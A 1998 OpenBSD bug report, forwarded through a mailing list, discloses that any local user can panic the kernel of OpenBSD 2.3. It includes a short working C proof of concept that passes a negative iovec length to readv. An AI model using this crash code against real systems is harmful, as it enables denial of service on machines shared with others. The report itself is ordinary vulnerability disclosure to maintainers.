-----Forwarded message from jonat_private----- Message-Id: <199807271126.MAA16724at_private> Date: Mon, 27 Jul 1998 12:26:36 +0100 (BST) From: jonat_private To: gnatsat_private X-Send-Pr-Version: 3.97 Subject: kernel/549: Any user can panic OpenBSD machine Sender: owner-bugsat_private >Number: 549 >Category: kernel >Synopsis: readv with -ve block size panics kernel >Confidential: yes >Severity: critical >Priority: high >Responsible: bugs >State: open >Class: sw-bug >Submitter-Id: net >Arrival-Date: Mon Jul 27 05:40:02 MDT 1998 >Last-Modified: >Originator: Jon Ribbens >Organization: \/ Jon Ribbens / jonat_private >Release: 2.3 >Environment: System : OpenBSD 2.3 Architecture: OpenBSD.i386 Machine : i386 >Description: readv with one of the blocks having a -ve size panics the kernel. Oops. >How-To-Repeat: #include <sys/types.h> #include <sys/uio.h> #include <unistd.h> int main(void) { struct iovec iov[1]; char buffer[1024]; iov[0].iov_base = buffer; iov[0].iov_len = -1; return readv(0, iov, 1); } run the above program, type a few characters, press return, observe either kernel panic or machine hang. panic message is "panic: ureadc: non-positive resid". Any user can do this. >Fix: Dunno I'm afraid. >Audit-Trail: >Unformatted: -----End of forwarded message----- -- Michael Fuhr http://www.fuhr.net/~mfuhr/
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:08:24 PDT